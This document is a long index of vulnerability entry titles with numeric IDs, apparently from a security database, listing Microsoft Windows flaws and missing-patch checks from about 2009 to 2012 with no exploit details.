Microsoft Windows Knowledge Base Article 2647516 update is not installed [72841] Microsoft Windows Knowledge Base Article 2645640 update is not installed [72840] Microsoft Windows Ancillary Function Driver privilege escalation [72839] Microsoft Windows Ancillary Function Driver privilege escalation [72838] Microsoft Windows Knowledge Base Article 2643719 update is not installed [72560] Microsoft Windows Media Format ASF invalid stream [72346] Microsoft Windows Explorer denial of service [72029] Microsoft Windows Knowledge Base Article 2638420 update is not installed [72003] Microsoft Windows Knowledge Base Article 2646524 update is not installed [72002] Microsoft Windows Client/Server Run-time Subsystem Unicode privilege escalation [71998] Microsoft Windows Knowledge Base Article 2644615 update is not installed [71997] Microsoft Windows SafeSEH security bypass [71995] Microsoft Windows Knowledge Base Article 2643584 update is not installed [71994] Microsoft Windows Knowledge Base Article 2636391 update is not installed [71993] Microsoft Windows DirectShow code execution [71992] Microsoft Windows Media Player MIDI code execution [71991] Microsoft Windows Knowledge Base Article 2607664 update is not installed [71966] Microsoft Windows Media Player access denial of service [71944] Microsoft Windows Phone messages denial of service [71873] Microsoft Windows win32k.sys code execution [71733] Microsoft Windows sandbox privilege escalation [71565] Microsoft Windows Knowledge Base Article 2648048 update is not installed [71564] Microsoft Windows Media Player DVR-MS code execution [71562] Microsoft Windows Knowledge Base Article 2640241 update is not installed [71560] Microsoft Windows Knowledge Base Article 2640045 update is not installed [71559] Microsoft Windows Active Directory buffer overflow [71558] Microsoft Windows Knowledge Base Article 2639417 update is not installed [71557] Microsoft Windows Knowledge Base Article 2639142 update is not installed [71554] Microsoft Windows Knowledge Base Article 2633171 update is not installed [71553] Microsoft Windows kernel privilege escalation [71552] Microsoft Windows Knowledge Base Article 2624667 update is not installed [71551] Microsoft Windows OLE object code execution [71550] Microsoft Windows Knowledge Base Article 2620712 update is not installed [71549] Microsoft Windows Client/Server Run-time Subsystem Csrsrv.dll privilege escalation [71548] Microsoft Windows Knowledge Base Article 2618451 update is not installed [71546] Microsoft Windows Knowledge Base Article 2618444 update is not installed [71542] Microsoft Windows Knowledge Base Article 2607702 update is not installed [71538] Microsoft Windows Knowledge Base Article 2590602 update is not installed [71418] Microsoft Windows keyboard layout denial of service [71291] Microsoft Windows Server AppLocker security bypass [71073] Microsoft Windows kernel Duqu code execution [70951] Microsoft Windows Knowledge Base Article 2630837 update is not installed [70950] Microsoft Windows Active Directory privilege escalation [70949] Microsoft Windows Knowledge Base Article 2620704 update is not installed [70948] Microsoft Windows Mail and Windows Meeting Space code execution [70947] Microsoft Windows Knowledge Base Article 2617657 update is not installed [70946] Microsoft Windows TrueType denial of service [70945] Microsoft Windows Knowledge Base Article 2603381 update is not installed [70944] Microsoft Windows Object Packager code execution [70943] Microsoft Windows Knowledge Base Article 2588516 update is not installed [70942] Microsoft Windows TCP/IP code execution [70940] Microsoft Windows ClickOnce code execution [70152] Microsoft Windows Knowledge Base Article 2623699 update is not installed [70150] Microsoft Windows Knowledge Base Article 2607670 update is not installed [70143] Microsoft Windows Media Center DLL code execution [70140] Microsoft Windows Knowledge Base Article 2652016 update is not installed [70137] Microsoft Windows Ancillary Function Driver privilege escalation [70130] Microsoft Windows Knowledge Base Article 2586448 update is not installed [70115] Microsoft Windows Knowledge Base Article 2567053 update is not installed [70114] Microsoft Windows use-after-free privilege escalation [70113] Microsoft Windows .fon buffer overflow [70112] Microsoft Windows TrueType denial of service [69638] Microsoft Windows csrss.exe denial of service [69558] Microsoft Windows Script Host DLL code execution [69501] Microsoft Windows Knowledge Base Article 2587634 update is not installed [69498] Microsoft Windows Knowledge Base Article 2587505 update is not installed [69492] Microsoft Windows Knowledge Base Article 2571621 update is not installed [69491] Microsoft Windows WINS privilege escalation [69490] Microsoft Windows Knowledge Base Article 2570947 update is not installed [69489] Microsoft Windows components DLL code execution [69215] Microsoft Windows DHCPv6 denial of service [69009] Microsoft Windows Client/Server Run-time Subsystem information disclosure [68840] Microsoft Windows Knowledge Base Article 2451858 update is not installed [68838] Microsoft SharePoint and Windows SharePoint Services cross-site scripting [68837] Microsoft SharePoint and Windows SharePoint Services XML file disclosure [68836] Microsoft SharePoint and Windows SharePoint Services contact details cross-site scripting [68833] Microsoft Windows Knowledge Base Article 2567943 update is not installed [68831] Microsoft Windows Knowledge Base Article 2570222 update is not installed [68830] Microsoft Windows Remote Desktop Protocol denial of service [68829] Microsoft Windows Knowledge Base Article 2567951 update is not installed [68827] Microsoft Windows Knowledge Base Article 2578230 update is not installed [68825] Microsoft Windows Knowledge Base Article 2546250 update is not installed [68824] Microsoft Windows Remote Desktop Web Access privilege escalation [68823] Microsoft Windows Knowledge Base Article 2559049 update is not installed [68816] Microsoft Windows Knowledge Base Article 2556532 update is not installed [68815] Microsoft Windows kernel meta-data denial of service [68814] Microsoft Windows Knowledge Base Article 2560656 update is not installed [68813] Microsoft Windows Data Access code execution [68812] Microsoft Windows Knowledge Base Article 2560978 update is not installed [68809] Microsoft Windows Knowledge Base Article 2562485 update is not installed [68808] Microsoft Windows DNS Server denial of service [68807] Microsoft Windows DNS Server code execution [68806] Microsoft Windows Knowledge Base Article 2566454 update is not installed [68805] Microsoft Windows NDISTAPI privilege escalation [68804] Microsoft Windows Knowledge Base Article 2563894 update is not installed [68803] Microsoft Windows TCP/IP QoS denial of service [68802] Microsoft Windows TCP/IP ICMP denial of service [68801] Microsoft Windows Knowledge Base Article 2567680 update is not installed [68800] Microsoft Windows Client/Server Run-time Subsystem Winsrv.dl privilege escalation [68469] Microsoft Windows GPU denial of service [68467] Microsoft Windows NVIDIA Geforce 310 denial of service [68465] Microsoft Windows Intel G41 denial of service [68315] Microsoft Windows Knowledge Base Article 2555917 update is not installed [68314] Microsoft Windows win32k.sys privilege escalation [68313] Microsoft Windows win32k.sys privilege escalation [68312] Microsoft Windows win32k.sys information disclosure [68311] Microsoft Windows NULL privilege escalation [68310] Microsoft Windows win32k.sys privilege escalation [68309] Microsoft Windows win32k.sys privilege escalation [68308] Microsoft Windows win32k.sys privilege escalation [68307] Microsoft Windows NULL pointer privilege escalation [68306] Microsoft Windows NULL pointer privilege escalation [68305] Microsoft Windows kernel-mode driver privilege escalation [68304] Microsoft Windows kernel-mode driver privilege escalation [68303] Microsoft Windows kernel-mode driver privilege escalation [68302] Microsoft Windows win32k.sys privilege escalation [68301] Microsoft Windows win32k.sys privilege escalation [68300] Microsoft Windows win32k.sys privilege escalation [68299] Microsoft Windows Knowledge Base Article 2566220 update is not installed [68298] Microsoft Windows Bluetooth stack code execution [68283] Microsoft Windows Knowledge Base Article 2560847 update is not installed [68002] Microsoft Windows Media Player klite denial of service [67989] Microsoft Windows tskill privilege escalation [67955] Microsoft Windows Knowledge Base Article 2530548 update is not installed [67943] Microsoft Windows Knowledge Base Article 2544521 update is not installed [67942] Microsoft Windows Vector Markup Language (VML) code execution [67795] Microsoft Windows Live Messenger dwmapi.dll code execution [67762] Microsoft Windows Knowledge Base Article 2543893 update is not installed [67759] Microsoft Windows Knowledge Base Article 2544893 update is not installed [67758] Microsoft Windows MHTML information disclosure [67757] Microsoft Windows Knowledge Base Article 2476490 update is not installed [67756] Microsoft Windows Object Linking and Embedding WMF code execution [67755] Microsoft Windows Knowledge Base Article 2503665 update is not installed [67754] Microsoft Windows Ancillary Function Driver privilege escalation [67753] Microsoft Windows Knowledge Base Article 2514842 update is not installed [67751] Microsoft Windows Knowledge Base Article 2518295 update is not installed [67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting [67749] Microsoft Windows Knowledge Base Article 2507938 update is not installed [67748] Microsoft Windows SrvWriteConsoleOutputString privilege escalation [67747] Microsoft Windows SrvWriteConsoleOutput privilege escalation [67746] Microsoft Windows CSRSS SrvSetConsoleNumberOfCommand privilege escalation [67745] Microsoft Windows CSRSS SrvSetConsoleLocalEUDC privilege escalation [67744] Microsoft Windows CSRSS AllocConsole privilege escalation [67737] Microsoft Windows Knowledge Base Article 2520426 update is not installed [67733] Microsoft Windows Knowledge Base Article 2525694 update is not installed [67732] Microsoft Windows Win32k OTF code execution [67731] Microsoft Windows Knowledge Base Article 2525835 update is not installed [67730] Microsoft Windows Server Hyper-V VMBus denial of service [67728] Microsoft Windows Knowledge Base Article 2535512 update is not installed [67727] Microsoft Windows DFS denial of service [67726] Microsoft Windows DFS code execution [67725] Microsoft Windows Knowledge Base Article 2536275 update is not installed [67724] Microsoft Windows SMB request denial of service [67722] Microsoft Windows Knowledge Base Article 2536276 update is not installed [67721] Microsoft Windows SMB responses code execution [67718] Microsoft Windows Knowledge Base Article 2537146 update is not installed [67709] Microsoft Windows Knowledge Base Article 2538814 update is not installed [67520] Microsoft Windows Vista nsiproxy.sys denial of service [67302] Microsoft Windows Knowledge Base Article 2545814 update is not installed [67101] Microsoft Windows Knowledge Base Article 2524426 update is not installed [67100] Microsoft Windows Windows Internet Name Service code execution [66856] Microsoft Windows Media Player .avi buffer overflow [66855] Microsoft Windows Media Player .ogg denial of service [66845] Microsoft Windows Knowledge Base Article 2506014 update is not installed [66844] Microsoft Windows Knowledge Base Article 2501584 update is not installed [66835] Microsoft Windows and Internet Explorer msxml.dll information disclosure [66639] Microsoft Windows XP afd.sys denial of service [66469] Microsoft Windows Explorer Shmedia.dll denial of service [66448] Microsoft Windows Knowledge Base Article 2508272 update is not installed [66447] Microsoft Windows Messenger ActiveX control code execution [66446] Microsoft Windows Knowledge Base Article 2514666 update is not installed [66445] Microsoft Windows VBScript and Jscript code execution [66444] Microsoft Windows Knowledge Base Article 2511455 update is not installed [66443] Microsoft Windows SMB response code execution [66442] Microsoft Windows Knowledge Base Article 2509553 update is not installed [66441] Microsoft Windows DNS resolution code execution [66440] Microsoft Windows Knowledge Base Article 2508429 update is not installed [66439] Microsoft Windows SMB protocol code execution [66438] Microsoft Windows Knowledge Base Article 2507618 update is not installed [66437] Microsoft Windows OpenType buffer overflow [66436] Microsoft Windows Knowledge Base Article 2497640 update is not installed [66432] Microsoft Windows Knowledge Base Article 2527308 update is not installed [66431] Microsoft Windows Fax Cover Page Editor code execution [66430] Microsoft Windows Knowledge Base Article 2503658 update is not installed [66428] Microsoft Windows Knowledge Base Article 2489979 update is not installed [66427] Microsoft Windows GDI+ EMF code execution [66425] Microsoft Windows Knowledge Base Article 2506223 update is not installed [66424] Microsoft Windows kernel-mode driver (win32k.sys) variant 30 privilege escalation [66423] Microsoft Windows kernel-mode driver (win32k.sys) variant 29 privilege escalation [66422] Microsoft Windows kernel-mode driver (win32k.sys) variant 28 privilege escalation [66421] Microsoft Windows kernel-mode driver (win32k.sys) variant 27 privilege escalation [66420] Microsoft Windows kernel-mode driver (win32k.sys) variant 26 privilege escalation [66419] Microsoft Windows kernel-mode driver (win32k.sys) variant 25 privilege escalation [66418] Microsoft Windows kernel-mode driver (win32k.sys) variant 24 privilege escalation [66417] Microsoft Windows kernel-mode driver (win32k.sys) variant 23 privilege escalation [66416] Microsoft Windows kernel-mode driver (win32k.sys) variant 22 privilege escalation [66415] Microsoft Windows kernel-mode driver (win32k.sys) variant 21 privilege escalation [66414] Microsoft Windows kernel-mode driver (win32k.sys) variant 20 privilege escalation [66413] Microsoft Windows kernel-mode driver (win32k.sys) variant 19 privilege escalation [66412] Microsoft Windows kernel-mode driver (win32k.sys) variant 18 privilege escalation [66411] Microsoft Windows kernel-mode driver (win32k.sys) variant 17 privilege escalation [66410] Microsoft Windows kernel-mode driver (win32k.sys) variant 16 privilege escalation [66409] Microsoft Windows kernel-mode driver (win32k.sys) variant 15 privilege escalation [66408] Microsoft Windows kernel-mode driver (win32k.sys) variant 14 privilege escalation [66407] Microsoft Windows kernel-mode driver (win32k.sys) variant 13 privilege escalation [66406] Microsoft Windows kernel-mode driver (win32k.sys) variant 12 privilege escalation [66405] Microsoft Windows kernel-mode driver (win32k.sys) variant 11 privilege escalation [66404] Microsoft Windows kernel-mode driver (win32k.sys) variant 10 privilege escalation [66403] Microsoft Windows kernel-mode driver (win32k.sys) variant 9 privilege escalation [66402] Microsoft Windows kernel-mode driver (win32k.sys) variant 8 privilege escalation [66401] Microsoft Windows kernel-mode driver (win32k.sys) variant 7 privilege escalation [66400] Microsoft Windows kernel-mode driver (win32k.sys) variant 6 privilege escalation [66399] Microsoft Windows kernel-mode driver (win32k.sys) variant 5 privilege escalation [66398] Microsoft Windows kernel-mode driver (win32k.sys) variant 4 privilege escalation [66397] Microsoft Windows kernel-mode driver (win32k.sys) variant 3 privilege escalation [66396] Microsoft Windows kernel-mode driver (win32k.sys) variant 2 privilege escalation [66395] Microsoft Windows kernel-mode driver (win32k.sys) variant 1 privilege escalation [66394] Microsoft Windows Knowledge Base Article 2485663 update is not installed [66312] Microsoft Windows Media Player .ape buffer overflow [66254] Microsoft Windows certificates spoofing [65972] Microsoft Windows mscorsvw.exe privilege escalation [65588] Microsoft Windows Knowledge Base Article 2489279 update is not installed [65581] Microsoft Windows Knowledge Base Article 2510030 update is not installed [65580] Microsoft Windows Knowledge Base Article 2489283 update is not installed [65575] Microsoft Windows Knowledge Base Article 2489293 update is not installed [65573] Microsoft Windows Knowledge Base Article 2494047 update is not installed [65570] Microsoft Windows Knowledge Base Article 2500212 update is not installed [65568] Microsoft Windows Knowledge Base Article 2508062 update is not installed [65567] Microsoft Windows RDC code execution [65495] Microsoft Windows HID weak security [65383] Microsoft Windows Graphics Rendering Engine height integer overflow [65382] Microsoft Windows Graphics Rendering Engine BMP integer overflow [65381] Microsoft Windows Graphics Rendering Engine biCompression buffer overflow [65376] Microsoft Windows Server CIFS code execution [65169] Microsoft Windows Azure information disclosure [65000] Microsoft Windows MHTML information disclosure [64973] Microsoft Windows Knowledge Base Article 2478960 update is not installed [64972] Microsoft Windows LSASS privilege escalation [64971] Microsoft Windows Knowledge Base Article 2479628 update is not installed [64970] Microsoft Windows Win32k.sys privilege escalation [64969] Microsoft Windows classpointer privilege escalation [64968] Microsoft Windows pointer privilege escalation [64967] Microsoft Windows Win32k.sys privilege escalation [64966] Microsoft Windows Win32k.sys privilege escalation [64927] Microsoft Windows Knowledge Base Article 2393802 update is not installed [64926] Microsoft Windows kernel privilege escalation [64925] Microsoft Windows Knowledge Base Article 2451879 update is not installed [64921] Microsoft Windows Media Player and Windows Media Center DVR-MS code execution [64920] Microsoft Windows Knowledge Base Article 2475792 update is not installed [64919] Microsoft Windows VBScript and JScript information disclosure [64918] Microsoft Windows Knowledge Base Article 2476687 update is not installed [64917] Microsoft Windows CSRSS privilege escalation [64916] Microsoft Windows Knowledge Base Article 2478953 update is not installed [64915] Microsoft Windows Active Directory denial of service [64914] Microsoft Windows Knowledge Base Article 2482017 update is not installed [64910] Microsoft Windows Knowledge Base Article 2483185 update is not installed [64909] Microsoft Windows Knowledge Base Article 2484015 update is not installed [64907] Microsoft Windows Knowledge Base Article 2485376 update is not installed [64906] Microsoft Windows OpenType Compact Font Format code execution [64905] Microsoft Windows Knowledge Base Article 2489256 update is not installed [64902] Microsoft Windows Knowledge Base Article 2496930 update is not installed [64901] Microsoft Windows Kerberos spoofing [64900] Microsoft Windows Kerberos checksum privilege escalation [64837] Microsoft Windows Fax Cover Page Editor code execution [64583] Microsoft Windows Neighbor Discovery (ND) protocol denial of service [64474] Microsoft Windows Remote Access Phonebook code execution [64446] Microsoft Windows Contacts DLL code execution [64382] Microsoft Windows Graphics Rendering Engine buffer overflow [64342] Microsoft Windows Knowledge Base Article 2451910 update is not installed [64339] Microsoft Windows Knowledge Base Article 2478935 update is not installed [64307] Microsoft Windows Windows Fax Cover Page Editor component buffer overflow [63909] Microsoft Windows dynamic-linked library (oci.dll) code execution [63816] Microsoft Windows Media Encoder 9 dynamic-linked library (DLL) code execution [63807] Microsoft Windows Mail dynamic-linked library (wab32res.dll) code execution [63803] Microsoft Windows Live Messenger dynamic-linked library (msgsres.dll) code execution [63788] Microsoft Windows Backup dynamic-linked library (fveapi.dll) code execution [63787] Microsoft Windows Internet Communication Settings dynamic-linked library (schannel.dll) code execution [63779] Microsoft Windows Indeo Filter dynamic-linked library (iacenc.dll) code execution [63776] Microsoft Windows Program Group Converter dynamic-linked library (DLL) code execution [63773] Microsoft Windows Address Book dynamic-linked library (wab32res.dll) code execution [63586] Microsoft Windows Knowledge Base Article 2207559 update is not installed [63585] Microsoft Windows Netlogon denial of service [63584] Microsoft Windows Knowledge Base Article 2424434 update is not installed [63583] Microsoft Windows Movie Maker insecure library loading code execution [63582] Microsoft Windows Knowledge Base Article 2423089 update is not installed [63580] Microsoft Windows Knowledge Base Article 2436673 update is not installed [63579] Microsoft Windows user mode privilege escalation [63578] Microsoft Windows cursor privilege escalation [63577] Microsoft Windows WriteAV privilege escalation [63576] Microsoft Windows pointer privilege escalation [63575] Microsoft Windows double free privilege escalation [63574] Microsoft Windows kernel-mode drivers buffer overflow [63573] Microsoft Windows Knowledge Base Article 2407132 update is not installed [63572] Microsoft Exchange Server RPC denial of service [63571] Microsoft Windows Knowledge Base Article 2440591 update is not installed [63570] Microsoft Windows NDProxy buffer overflow [63569] Microsoft Windows Knowledge Base Article 2385678 update is not installed [63568] Microsoft Windows BranchCache code execution [63566] Microsoft Windows Knowledge Base Article 2442962 update is not installed [63565] Microsoft Windows Consent User Interface privilege escalation [63564] Microsoft Windows Knowledge Base Article 2345316 update is not installed [63563] Microsoft Windows Server Hyper-V VMBus denial of service [63562] Microsoft Windows Knowledge Base Article 2296199 update is not installed [63561] Microsoft Windows OpenType Font (OTF) CMAP code execution [63560] Microsoft Windows OpenType Font (OTF) format driver code execution [63559] Microsoft Windows OpenType Font (OTF) format driver code execution [63558] Microsoft Windows Knowledge Base Article 2416400 update is not installed [63550] Microsoft Windows Knowledge Base Article 2447961 update is not installed [63549] Microsoft Windows Media Encoder code execution [63548] Microsoft Windows Knowledge Base Article 2443105 update is not installed [63547] Microsoft Windows Internet Signup code execution [63546] Microsoft Windows Knowledge Base Article 2455005 update is not installed [63544] Microsoft Windows Knowledge Base Article 2292970 update is not installed [63538] Microsoft Windows Knowledge Base Article 968095 update is not installed [63450] Microsoft Windows REG_BINARY privilege escalation [62805] Microsoft Windows Knowledge Base Article 2316074 update is not installed [62797] Microsoft Windows Knowledge Base Article 2305420 update is not installed [62796] Microsoft Windows Task Scheduler privilege escalation [62793] Microsoft Windows Knowledge Base Article 2293386 update is not installed [62789] Microsoft Windows Knowledge Base Article 2423930 update is not installed [62737] Microsoft WindowsTask Scheduler service privilege escalation [62716] Microsoft Windows Mobile .vcf denial of service [62643] Microsoft Windows unspecified privilege escalation [62642] Microsoft Windows unspecified privilege escalation [62170] Microsoft Windows Knowledge Base Article 2296011 update is not installed [62169] Microsoft Windows Explorer buffer overflow [62166] Microsoft Windows Knowledge Base Article 2294255 update is not installed [62165] Microsoft Windows Failover Cluster Manager insecure permissions [62163] Microsoft Windows Knowledge Base Article 2281679 update is not installed [62162] Microsoft Windows Media Player RTSP code execution [62154] Microsoft Windows Knowledge Base Article 2279986 update is not installed [62153] Microsoft Windows OpenType Font fonts privilege escalation [62152] Microsoft Windows OpenType Font privilege escalation [62149] Microsoft Windows Knowledge Base Article 2207566 update is not installed [62148] Microsoft Windows SChannel denial of service [62147] Microsoft Windows Knowledge Base Article 2160841 update is not installed [62143] Microsoft Windows Knowledge Base Article 982132 update is not installed [62142] Microsoft Windows OpenType table code execution [62138] Microsoft Windows Knowledge Base Article 981957 update is not installed [62137] Microsoft Windows class privilege escalation [62135] Microsoft Windows keyboard privilege escalation [62134] Microsoft Windows Knowledge Base Article 2412048 update is not installed [62133] Microsoft Windows Knowledge Base Article 2405882 update is not installed [62129] Microsoft Windows Knowledge Base Article 2387149 update is not installed [62126] Microsoft Windows Knowledge Base Article 2378111 update is not installed [62125] Microsoft Windows Media Player code execution [62123] Microsoft Windows Knowledge Base Article 2360937 update is not installed [62118] Microsoft Windows Knowledge Base Article 2293211 update is not installed [62104] Microsoft Windows Knowledge Base Article 2360131 update is not installed [62103] Microsoft Windows LPC message privilege escalation [62098] Microsoft Windows Knowledge Base Article 2293194 update is not installed [62069] Microsoft Windows Knowledge Base Article 2418042 update is not installed [62006] Microsoft Windows unspecified privilege escalation [61994] Microsoft Windows MPEG Layer-3 Audio Decoder denial of service [61519] Microsoft Windows Knowledge Base Article 2121546 update is not installed [61518] Microsoft Windows CSRSS privilege escalation [61517] Microsoft Windows Knowledge Base Article 2259922 update is not installed [61514] Microsoft Windows Knowledge Base Article 2267960 update is not installed [61510] Microsoft Windows Knowledge Base Article 2315011 update is not installed [61507] Microsoft Windows Knowledge Base Article 2320113 update is not installed [61506] Microsoft Windows Unicode Scripts Processor code execution [61504] Microsoft Windows Knowledge Base Article 2347290 update is not installed [61503] Microsoft Windows Print Spooler service code execution [61501] Microsoft Windows Knowledge Base Article 975558 update is not installed [61500] Microsoft Windows MPEG-4 code execution [61499] Microsoft Windows Knowledge Base Article 982802 update is not installed [61258] Microsoft Windows IcmpSendEcho2Ex denial of service [61187] Microsoft Windows xxxRealDrawMenuItem() privilege escalation [61184] Microsoft Windows win32k!GreStretchBltInternal() denial of service [61129] Microsoft Windows Kerberos security bypass [60975] Microsoft Windows CreateDIBPalette() buffer overflow [60736] Microsoft Windows Knowledge Base Article 2265906 update is not installed [60734] Microsoft Windows Knowledge Base Article 2269638 update is not installed [60728] Microsoft Windows Knowledge Base Article 2269707 update is not installed [60724] Microsoft Windows Knowledge Base Article 2286198 update is not installed [60723] Microsoft Windows Knowledge Base Article 978886 update is not installed [60722] Microsoft Windows TCP/IP input buffer privilege escalation [60721] Microsoft WindowsTCP/IP IPv6 denial of service [60719] Microsoft Windows Knowledge Base Article 980436 update is not installed [60718] Microsoft Windows SChannel code execution [60713] Microsoft Windows Knowledge Base Article 2183461 update is not installed [60705] Microsoft Windows Knowledge Base Article 981852 update is not installed [60704] Microsoft Windows kernel ACL denial of service [60703] Microsoft Windows kernel errors privilege escalation [60702] Microsoft Windows kernel threads privilege escalation [60701] Microsoft Windows Knowledge Base Article 981997 update is not installed [60700] Microsoft Windows Movie Maker code execution [60698] Microsoft Windows Knowledge Base Article 2160329 update is not installed [60697] Microsoft Windows kernel-mode drivers window privilege escalation [60696] Microsoft Windows kernel-mode drivers input privilege escalation [60695] Microsoft Windows kernel-mode drivers memory privilege escalation [60694] Microsoft Windows kernel-mode drivers exception privilege escalation [60693] Microsoft Windows kernel-mode drivers denial of service [60692] Microsoft Windows Knowledge Base Article 982214 update is not installed [60691] Microsoft Windows SMB stack denial of service [60690] Microsoft Windows SMB variable denial of service [60689] Microsoft Windows SMB pool code execution [60688] Microsoft Windows Knowledge Base Article 982665 update is not installed [60687] Microsoft Windows Cinepak Codec code execution [60686] Microsoft Windows Knowledge Base Article 2115168 update is not installed [60685] Microsoft Windows MPEG Layer-3 Codecs code execution [60684] Microsoft Windows Knowledge Base Article 2079403 update is not installed [60683] Microsoft Windows XML Core Services (MSXML) code execution [60682] Microsoft Windows Knowledge Base Article 982799 update is not installed [60681] Microsoft Windows Tracing Feature privilege escalation [60680] Microsoft Windows Knowledge Base Article 2264072 update is not installed [60679] Microsoft Windows registry key ACL privilege escalation [60678] Microsoft Windows Service Isolation privilege escalation [60677] Microsoft Windows Knowledge Base Article 983539 update is not installed [60676] Microsoft Windows LSASS privilege escalation [60422] Microsoft Windows .lnk file code execution [60120] Microsoft Windows NtUserCheckAccessForIntegrityLevel() privilege escalation [60095] Microsoft Windows UpdateFrameTitleForDocument() buffer overflow [59901] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59898] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59895] Microsoft Windows Knowledge Base Article 978212 update is not installed [59891] Microsoft Windows Knowledge Base Article 982335 update is not installed [59447] Microsoft Windows Help and Support Center GetServerName cross-site scripting [59267] Microsoft Windows helpctr.exe command execution [58944] Microsoft Windows Knowledge Base Article 979902 update not installed [58943] Microsoft Windows MJPEG code execution [58942] Microsoft Windows media files code execution [58913] Microsoft Windows Knowledge Base Article 2027452 update is not installed [58891] Microsoft Windows Knowledge Base Article 2028554 update is not installed [58887] Microsoft Windows kernel-mode drivers TrueType privilege escalation [58885] Microsoft Windows Knowledge Base Article 980218 update is not installed [58884] Microsoft Windows OpenType Compact Font Format privilege escalation [58883] Microsoft Windows Knowledge Base Article 981343 update is not installed [58871] Microsoft Windows Knowledge Base Article 982381 update is not installed [58865] Microsoft Windows Knowledge Base Article 982666 update is not installed [58863] Microsoft Windows Knowledge Base Article 983235 update is not installed [58622] Microsoft Windows Canonical Display Driver (cdd.dll) code execution [58345] Microsoft Windows SMTP Service query id spoofing [58344] Microsoft Windows SMTP Service DNS spoofing [58243] Microsoft Office SharePoint Server and Microsoft Windows SharePoint Services help.aspx cross-site scripting [58173] Microsoft Windows Knowledge Base Article 978542 update is not installed [58172] Microsoft Outlook Express and Windows Mail client integer overflow [58171] Microsoft Windows Knowledge Base Article 978213 update is not installed [58060] Microsoft Windows SfnINSTRING() privilege escalation [58059] Microsoft Windows SfnLOGONNOTIFY() denial of service [57601] Microsoft Windows kernel exceptions denial of service [57600] Microsoft Windows kernel image file denial of service [57599] Microsoft Windows kernel path denial of service [57597] Microsoft Windows kernel registry keys denial of service [57596] Microsoft Windows kernel symbolic links denial of service [57595] Microsoft Windows kernel registry keys denial of service [57580] Microsoft Windows Knowledge Base Article 981210 update is not installed [57579] Microsoft Windows Cabinet File Viewer (cabview.dll) code execution [57578] Microsoft Windows WinVerifyTrust signature validation code execution [57380] Microsoft Windows Knowledge Base Article 979683 update is not installed [57379] Microsoft Windows kernel symbolic link privilege escalation [57378] Microsoft Windows kernel memory privilege escalation [57377] Microsoft Windows Knowledge Base Article 979559 update is not installed [57376] Microsoft Windows kernel-mode drivers windows privilege escalation [57375] Microsoft Windows kernel-mode drivers objects privilege escalation [57374] Microsoft Windows Knowledge Base Article 977816 update is not installed [57372] Microsoft Windows Knowledge Base Article 978338 update is not installed [57370] Microsoft Windows ISATAP IPv6 spoofing [57343] Microsoft Windows Knowledge Base Article 979402 update is not installed [57342] Microsoft Windows Media Player ActiveX control code execution [57341] Microsoft Windows Knowledge Base Article 980094 update is not installed [57337] Microsoft Windows Knowledge Base Article 980195 update is not installed [57336] Microsoft Windows Knowledge Base Article 980232 update is not installed [57335] Microsoft Windows SMB message code execution [57334] Microsoft Windows SMB transaction responses code execution [57333] Microsoft Windows SMB code execution [57332] Microsoft Windows SMB memory privilege escalation [57330] Microsoft Windows Knowledge Base Article 980858 update is not installed [57329] Microsoft Windows Media Services info packets buffer overflow [57328] Microsoft Windows Knowledge Base Article 981160 update is not installed [57326] Microsoft Windows Knowledge Base Article 981169 update is not installed [57325] Microsoft Windows Knowledge Base Article 981832 update is not installed [57324] Microsoft Windows SMTP Service Simple Mail Transfer Protocol memory information disclosure [57323] Microsoft Windows SMTP Service and Microsoft Exchange SMTP DNS Mail Exchanger (MX) denial of service [57322] Microsoft Windows Knowledge Base Article 980182 update is not installed [57205] Microsoft Windows Media Player .AVI code execution [56853] Microsoft Windows MS HTML Help ActiveX control (hhctrl.ocx) HtmlHelpA() code execution [56756] Microsoft Windows .ani file denial of service [56591] Microsoft Windows API denial of service [56560] Microsoft Windows winhlp32.exe buffer overflow [56558] Microsoft Windows MsgBox() code execution [56470] Microsoft Windows Knowledge Base Article 980150 update is not installed [56461] Microsoft Windows Knowledge Base Article 975561 update is not installed [56435] Microsoft Windows Media Player .mpg denial of service [56218] Microsoft Windows DNS weak security [55935] Microsoft Windows Knowledge Base Article 975713 update is not installed [55934] Microsoft Windows Knowledge Base Article 978037 update is not installed [55933] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) privilege escalation [55932] Microsoft Windows Knowledge Base Article 978214 update is not installed [55930] Microsoft Windows Knowledge Base Article 977935 update is not installed [55928] Microsoft Windows Knowledge Base Article 978706 update is not installed [55926] Microsoft Windows Knowledge Base Article 977894 update is not installed [55925] Microsoft Windows Hyper-V instruction set denial of service [55924] Microsoft Windows Knowledge Base Article 977377 update is not installed [55923] Microsoft Windows Knowledge Base Article 977290 update is not installed [55922] Microsoft Windows Kerberos Ticket-Granting-Ticket (TGT) denial of service [55921] Microsoft Windows Knowledge Base Article 977165 update is not installed [55920] Microsoft Windows kernel privilege escalation [55917] Microsoft Windows Knowledge Base Article 978262 update is not installed [55910] Microsoft Windows Knowledge Base Article 971468 update is not installed [55909] Microsoft Windows SMB NTLM privilege escalation [55908] Microsoft Windows SMB NULL denial of service [55907] Microsoft Windows SMB denial of service [55906] Microsoft Windows SMB pathname code execution [55898] Microsoft Windows Knowledge Base Article 974145 update is not installed [55897] Microsoft Windows TCP/IP SACK denial of service [55896] Microsoft Windows TCP/IP Route Information code execution [55895] Microsoft Windows TCP/IP stack datagram code execution [55894] Microsoft Windows TCP/IP ICMPv6 code execution [55890] Microsoft Windows Knowledge Base Article 975416 update is not installed [55779] Microsoft Windows Knowledge Base Article 978207 update is not installed [55742] Microsoft Windows #GP trap handler privilege escalation [55680] Microsoft Windows Media Player ActiveX control code execution [55560] Microsoft Windows XP Flash Player code execution [55153] Microsoft Windows Knowledge Base Article 978251 update is not installed [55152] Microsoft Windows Server Message Block client code execution [55151] Microsoft Windows Server Message Block pool code execution [55150] Microsoft Windows Knowledge Base Article 972270 update is not installed [55149] Microsoft Windows EOT font buffer overflow [54645] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54644] Microsoft Internet Explorer and Windows Media player Intel Indeo codec code execution [54643] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54642] Microsoft Internet Explorer and Windows Media player Intel Indeo41 codec buffer overflow [54445] Microsoft Windows Knowledge Base Article 975539 update is not installed [54443] Microsoft Windows Knowledge Base Article 974392 update is not installed [54442] Microsoft Windows Local Security Authority Subsystem Service (LSASS) denial of service [54440] Microsoft Windows Knowledge Base Article 974318 update is not installed 